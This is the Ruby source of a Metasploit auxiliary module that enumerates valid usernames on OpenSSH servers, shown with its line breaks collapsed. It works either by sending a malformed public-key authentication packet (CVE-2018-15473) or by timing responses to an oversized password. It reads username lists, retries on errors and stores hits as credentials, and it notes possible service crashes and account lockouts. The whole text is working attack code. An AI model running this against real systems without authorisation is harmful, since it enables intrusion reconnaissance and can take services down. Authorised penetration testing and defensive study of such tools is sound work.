SSH Username Enumeration

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary  include Msf::Exploit::Remote::SSH  include Msf::Auxiliary::Scanner  include Msf::Auxiliary::Report  def initialize(info = {})    super(      update_info(        info,        'Name' => 'SSH Username Enumeration',        'Description' => %q{          This module uses a malformed packet or timing attack to enumerate users on          an OpenSSH server.          The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST          packet using public key authentication (must be enabled) to enumerate users.          On some versions of OpenSSH under some configurations, OpenSSH will return a          "permission denied" error for an invalid user faster than for a valid user,          creating an opportunity for a timing attack to enumerate users.          Testing note: invalid users were logged, while valid users were not. YMMV.        },        'Author' => [          'kenkeiras',     # Timing attack          'Dariusz Tytko', # Malformed packet          'Michal Sajdak', # Malformed packet          'Qualys',        # Malformed packet          'wvu'            # Malformed packet        ],        'References' => [          ['CVE', '2003-0190'],          ['CVE', '2006-5229'],          ['CVE', '2016-6210'],          ['CVE', '2018-15473'],          ['OSVDB', '32721'],          ['BID', '20418'],          ['URL', 'https://seclists.org/oss-sec/2018/q3/124'],          ['URL', 'https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/']        ],        'License' => MSF_LICENSE,        'Actions' => [          [            'Malformed Packet',            {              'Description' => 'Use a malformed packet',              'Type' => :malformed_packet            }          ],          [            'Timing Attack',            {              'Description' => 'Use a timing attack',              'Type' => :timing_attack            }          ]        ],        'DefaultAction' => 'Malformed Packet',        'Notes' => {          'Stability' => [            CRASH_SERVICE_DOWN # possible that a malformed packet may crash the service          ],          'Reliability' => [],          'SideEffects' => [            IOC_IN_LOGS,            ACCOUNT_LOCKOUTS, # timing attack submits a password          ]        }      )    )    register_options(      [        Opt::Proxies,        Opt::RPORT(22),        OptString.new('USERNAME',                      [false, 'Single username to test (username spray)']),        OptPath.new('USER_FILE',                    [false, 'File containing usernames, one per line']),        OptBool.new('DB_ALL_USERS',                    [false, 'Add all users in the current database to the list', false]),        OptInt.new('THRESHOLD',                   [                     true,                     'Amount of seconds needed before a user is considered ' \                     'found (timing attack only)', 10                   ]),        OptBool.new('CHECK_FALSE',                    [false, 'Check for false positives (random username)', true])      ]    )    register_advanced_options(      [        OptInt.new('RETRY_NUM',                   [                     true, 'The number of attempts to connect to a SSH server' \                   ' for each user', 3                   ]),        OptInt.new('SSH_TIMEOUT',                   [                     false, 'Specify the maximum time to negotiate a SSH session',                     10                   ]),        OptBool.new('SSH_DEBUG',                    [                      false, 'Enable SSH debugging output (Extreme verbosity!)',                      false                    ])      ]    )  end  def rport    datastore['RPORT']  end  def retry_num    datastore['RETRY_NUM']  end  def threshold    datastore['THRESHOLD']  end  # Returns true if a nonsense username appears active.  def check_false_positive(ip)    user = Rex::Text.rand_text_alphanumeric(8..32)    attempt_user(user, ip) == :success  end  def check_user(ip, user, port)    technique = action['Type']    opts = ssh_client_defaults.merge({      port: port    })    # The auth method is converted into a class name for instantiation,    # so malformed-packet here becomes MalformedPacket from the mixin    case technique    when :malformed_packet      opts.merge!(auth_methods: ['malformed-packet'])    when :timing_attack      opts.merge!(        auth_methods: ['password', 'keyboard-interactive'],        password: rand_pass      )    end    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']    start_time = Time.new    begin      ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do        Net::SSH.start(ip, user, opts)      end    rescue Rex::ConnectionError      return :connection_error    rescue Timeout::Error      return :success if technique == :timing_attack    rescue Net::SSH::AuthenticationFailed      return :fail if technique == :malformed_packet    rescue Net::SSH::Exception => e      vprint_error("#{e.class}: #{e.message}")    end    finish_time = Time.new    case technique    when :malformed_packet      return :success if ssh    when :timing_attack      return :success if (finish_time - start_time > threshold)    end    :fail  end  def rand_pass    Rex::Text.rand_text_english(64_000..65_000)  end  def do_report(ip, user, _port)    service_data = {      address: ip,      port: rport,      service_name: 'ssh',      protocol: 'tcp',      workspace_id: myworkspace_id    }    credential_data = {      origin_type: :service,      module_fullname: fullname,      username: user    }.merge(service_data)    login_data = {      core: create_credential(credential_data),      status: Metasploit::Model::Login::Status::UNTRIED    }.merge(service_data)    create_credential_login(login_data)  end  # Because this isn't using the AuthBrute mixin, we don't have the  # usual peer method  def peer(rhost = nil)    "#{rhost}:#{rport} - SSH -"  end  def user_list    users = []    users << datastore['USERNAME'] unless datastore['USERNAME'].blank?    if datastore['USER_FILE']      fail_with(Failure::BadConfig, 'The USER_FILE is not readable') unless File.readable?(datastore['USER_FILE'])      users += File.read(datastore['USER_FILE']).split    end    if datastore['DB_ALL_USERS']      if framework.db.active        framework.db.creds(workspace: myworkspace.name).each do |o|          users << o.public.username if o.public        end      else        print_warning('No active DB -- The following option will be ignored: DB_ALL_USERS')      end    end    users.uniq  end  def attempt_user(user, ip)    attempt_num = 0    ret = nil    while (attempt_num <= retry_num) && (ret.nil? || (ret == :connection_error))      if attempt_num > 0        Rex.sleep(2**attempt_num)        vprint_status("#{peer(ip)} Retrying '#{user}' due to connection error")      end      ret = check_user(ip, user, rport)      attempt_num += 1    end    ret  end  def show_result(attempt_result, user, ip)    case attempt_result    when :success      print_good("#{peer(ip)} User '#{user}' found")      do_report(ip, user, rport)    when :connection_error      vprint_error("#{peer(ip)} User '#{user}' could not connect")    when :fail      vprint_error("#{peer(ip)} User '#{user}' not found")    end  end  def run    if user_list.empty?      fail_with(Failure::BadConfig, 'Please populate DB_ALL_USERS, USER_FILE, USERNAME')    end    super  end  def run_host(ip)    print_status("#{peer(ip)} Using #{action.name.downcase} technique")    if datastore['CHECK_FALSE']      print_status("#{peer(ip)} Checking for false positives")      if check_false_positive(ip)        print_error("#{peer(ip)} throws false positive results. Aborting.")        return      end    end    users = user_list    print_status("#{peer(ip)} Starting scan")    users.each { |user| show_result(attempt_user(user, ip), user, ip) }  endend